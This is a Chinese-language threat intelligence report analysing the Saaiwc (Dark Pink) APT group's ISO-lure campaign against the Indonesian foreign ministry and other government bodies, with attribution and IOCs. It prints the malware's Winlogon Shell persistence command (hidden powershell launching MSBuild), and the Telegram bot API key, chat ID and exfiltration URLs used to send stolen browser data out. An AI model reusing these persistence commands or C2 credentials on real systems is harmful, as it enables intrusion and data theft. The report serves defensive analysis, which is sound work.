查看原文
其他

Saaiwc组织针对印尼政府的攻击活动分析

高级威胁研究院 360威胁情报中心 2023-08-08

Saaiwc组织,又名Dark Pink,是一个主要以东南亚国家为目标的APT组织,该组织从2021年开始活跃,发起针对过越南、印度尼西亚、马来西亚、柬埔寨和菲律宾的政府及军事部门的网络攻击。

近期,360高级威胁研究院在日常威胁狩猎中发现Saaiwc组织针对印度尼西亚外交部等政府部门的多个网络攻击活动。在本轮攻击活动中,该组织利用磁盘映像文件作为恶意载体,诱导执行后解密释放MSBuild Project文件,随后利用计划任务触发winlogon注册表以启动MSBuild.exe工具生成并加载恶意载荷,从而完成窃密行动。

 一、攻击活动分析  

1.攻击流程分析  

Saaiwc组织常以ISO磁盘映像文件格式作为攻击载荷,本次捕获的攻击样本也不例外,采用的是ISO格式,解压后都包含伪装文档、正常程序以及需要侧加载的恶意DLL,并且均由印度尼西亚所在地区上传。结合该组织经常使用鱼叉式网络钓鱼攻击手法,推断本次攻击应该也是使用鱼叉钓鱼投递方式。

该组织近期攻击流程大致如下所示:

攻击者首先利用磁盘映象文件作为攻击载体,当受害者打开恶意ISO文件后,点击执行伪装成DOC文档的可执行程序,该程序实为Winword.exe白程序,执行时侧加载同目录下的MSVCR100.DLL,该恶意DLL首先从诱饵文件中解密释放出MSBuild project文件,随后打开原始诱饵文件,接着在注册表winlogon项新建值,当系统重新登录时执行MSBuild.exe加载project文件操作,从而开启窃密行动,最后创建计划任务定时注销电脑,以此实现驻留。

2.载荷基本信息  

本次捕获的ISO样本基本信息如下所示:

MD5

文件名

836184b7387b212f8b7f064d5e60f587

Concept paper  Strategic Dialogue DEU-IDN.zip.iso

0f50af41edb7e3456cba4dd05b805da1

230131 brafaks  ttd dir pro PTRI ASEAN undangan narasumber perwakins norwegia.iso

1ee99e4eb1a855186812204a1e3b72de

CONCEPT NOTE - A  SUSTAINABLE FORUM - BUILDING THE RESEARCH CAPACITY OF THE EAMF 16 DEC  2022.iso

解压并执行相关样本后,会显示相关诱饵文件。
诱饵1主题
邀请印尼东盟主席团出席挪威驻东南亚首席代表和高级外交官代表团访问雅加达的联合简报会。         

诱饵2主题
印尼-德国战略对话。         

诱饵3主题
东盟合作项目建议书         

这些诱饵文档主题均涉及印尼,再结合样本是由印尼所在地区上传,因此Saaiwc组织在本轮攻击中使用的样本主要针对印尼。

3.载荷投递分析

本轮捕获的针对印尼攻击样本流程基本一致,下面就其中一个样本(MD5:0f50af41edb7e3456cba4dd05b805da1)进行详细分析,该文件为ISO类型,文件名使用印尼语进行伪装。

当点击ISO文件时,可看到伪装成word图标文档的应用程序,以便用户运行,该程序实为正常文件winword.exe,运行后会侧加载同目录下的MSVCR100.dll,该DLL被隐藏,同时还有一个隐藏的DOC文件。隐藏文件夹不显示,打开如下图所示:

取消隐藏后打开就能看到恶意程序。

侧加载的恶意DLL文件信息如下:

文件名称

MSVCR100.dll

文件大小

41.00 KB (41984字节)

MD5

c431ddc7ed614effd8e2ae816107de3f

编译时间

2022-12-22 00:12:05

该DLL执行时首先遍历同目录下的文件找到ISO里面的隐藏诱饵文件,即“~230131 brafaks ttd dir pro PTRI ASEAN undangan narasumber perwakins norwegia.doc”。    

读取该文件对其进行异或0xCA解密,将其中的xml文件保存到%TEMP%//wct1FDA.tmp,解密出的xml文件部分内容如下所示:

接着创建winword.exe进程打开诱饵文件。

随后获取MSBuildToolsPath工具路径,并打开“Environment”注册表项创建新值。

新建的字符串值MS、PSS和TMPT的数据如下所示。

然后打开注册表"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\",并新建字符串值Shell项。

Shell项具体数据如下:

explorer.exe, %PSS% -nop -w h \"Start-Process -N -F $env:MS -A $env:TMPT\

将环境变量值进行替换,得到该实际数据。

explorer.exe, powershell -nop -w h \"Start-Process -N -F C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe  -A C:\\Users\\***\\AppData\\Local\\Temp\\wct1FDA.tmp\"

该项主要是通过powershell启动MSBild.exe运行解密出的project xml文件。

最后创建名为“Health Check”的计划任务,在每周三、周五的13:15分启动,其操作为注销电脑,从而触发注册表winlogon项,以此实现驻留。

4.攻击组件分析  

通过定时任务启动的MSBuild Project文件(wct1FDA.tmp)信息如下:

文件名称

wct1FDA.tmp

文件大小

490.00 KB (501832字节)

MD5

9bdb78cc2978bffbaea2ca38da5bcae7

该文件先对base64数据异或解密,接着解压缩得到后门文件,然后传入参数内存加载后门文件并执行其中的PRLiSNFR方法。

后门文件信息如下所示:

文件名称

svchost.dll

文件大小

1.06 MB (1121280字节)

MD5

924ead4a5d65e3ca7a327d8be38bb725

编译时间

2022-12-22 17:12:15

该恶意程序先对传入参数进行解密,得到与Telegram通信的APIKEY:5829567199:AAGNxhJvQ4LoxKD_dZx_C0FnGQzOGLbruOQ和 CHATID:5556823494,接着执行main.Execute函数。

Execute函数配置APIKEY,CHATID,计算机名以及Telegram通信域名的值,可以看到代码被严重混淆,每次都需要FixedUpdate函数进行解密,并且该函数将当前栈帧函数名作为解密配置。

随后启动RUN函数,首先判断“%LOCALAPPDATA%\\desktop.ini.dat”文件是否存在,若不存在,则创建该文件写入数据“AGNxhJvQ4LoxKD_:0”作为感染标志,然后设置文件属性为隐藏模式。

并且发起初次请求,请求地址为api.telegram.org/bot5829567199:AAGNxhJvQ4LoxKD_dZx_C0FnGQzOGLbruOQ/sendMessage,其数据为{chat_id:5556823494,text:"{whoami}:\n {command}:\n\n{whoami} first time come",parse_mode:html},上线url的指令command为空,若非初次上线,并且存在desktop.ini.dat文件时,“first time come”则改变为“come back”。

接着获取Chrome 、Edge和FireFox浏览器的数据并加密后采用post的方式上传到"api.telegram.org/bot5829567199:AAGNxhJvQ4LoxKD_dZx_C0FnGQzOGLbruOQ/sendDocument?chat_id=5556823494?caption={whoami} "。

完成上传后就一直等待服务端返回数据并解析指令执行相应操作,指令信息如下表格所示。

指令

描述

SHOWUP

执行上线

GETBRWS

窃取浏览器数据并上传

TOKENNEW

更新Telegram通信的APIKEY和CHATID

XMLNEW

更新xml文件

二、归属研判  

通过详细分析样本,发现本次攻击样本和Saaiwc组织前期攻击组件存在很高的相似度。

1) 本次攻击整体流程相似,攻击载体均使用ISO文件,并且都是利用白文件加载恶意DLL,进而完成窃密行为;

2) 攻击者均使用APIKEY和CHATID与Telegram-API接口通信,并且通信格式也存在相似度;

3) 最终攻击组件代码逻辑与俄罗斯网络安全公司Group-IB发表文章(https://www.group-ib.com/blog/dark-pink-apt/)提到的KamiKakaBot组件相似度很高,只是本次采用.NET版本,并且关键信息、字符串都进行了加密混淆处理,提高了分析难度。

4) 本次捕获的攻击样本主要针对印尼相关政府机构,该目标符合该组织的定向攻击方向。

综上,将本轮攻击行动归属到Saaiwc组织。


总结

Saaiwc组织自被披露以来,针对东南亚国家的攻击行动一直处于活跃之中,并且有愈演愈烈的趋势。在本轮针对印度尼西亚政府的攻击行动中,该组织仍以ISO文件作为恶意载体,采用了系统登录启动项来执行msbulid.exe从而完成对恶意载荷的加载,并且最恶意载荷使用了较为复杂的混淆方式,这都表明该组织仍在不断丰富自己的攻击手段和积极探索新的攻击技术。最终载荷支持更新配置文件说明该组织的攻击代码已呈现出模块化的特点,后续可能开发出新的攻击武器,我们也将持续关注该组织针对东南亚及其他地区的攻击武器。

         

附录 IOC

MD5:

0f50af41edb7e3456cba4dd05b805da1

836184b7387b212f8b7f064d5e60f587

1ee99e4eb1a855186812204a1e3b72de

30f8c62e7736947fbd352b328f8bfbb5

c431ddc7ed614effd8e2ae816107de3f

9bdb78cc2978bffbaea2ca38da5bcae7

924ead4a5d65e3ca7a327d8be38bb725

315d7eb085ee8f0a0d81c81916895f5d

ee0642a6b59328c4dd91f18ef5026722

f1ff57100f578a3c6acb754b6688cc30

1c5f620b388d47aea55b829c28d95958

C&C:

https://api.telegram.org/bot5829567199:AAGNxhJvQ4LoxKD_dZx_C0FnGQzOGLbruOQ/sendMessage

https://api.telegram.org/bot5829567199:AAGNxhJvQ4LoxKD_dZx_C0FnGQzOGLbruOQ/sendDocument?chat_id=5556823494

         

参考

https://www.group-ib.com/blog/dark-pink-apt/







360高级威胁研究院

360高级威胁研究院是360数字安全集团的核心能力支持部门,由360资深安全专家组成,专注于高级威胁的发现、防御、处置和研究,曾在全球范围内率先捕获双杀、双星、噩梦公式等多起业界知名的0day在野攻击,独家披露多个国家级APT组织的高级行动,赢得业内外的广泛认可,为360保障国家网络安全提供有力支撑。

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存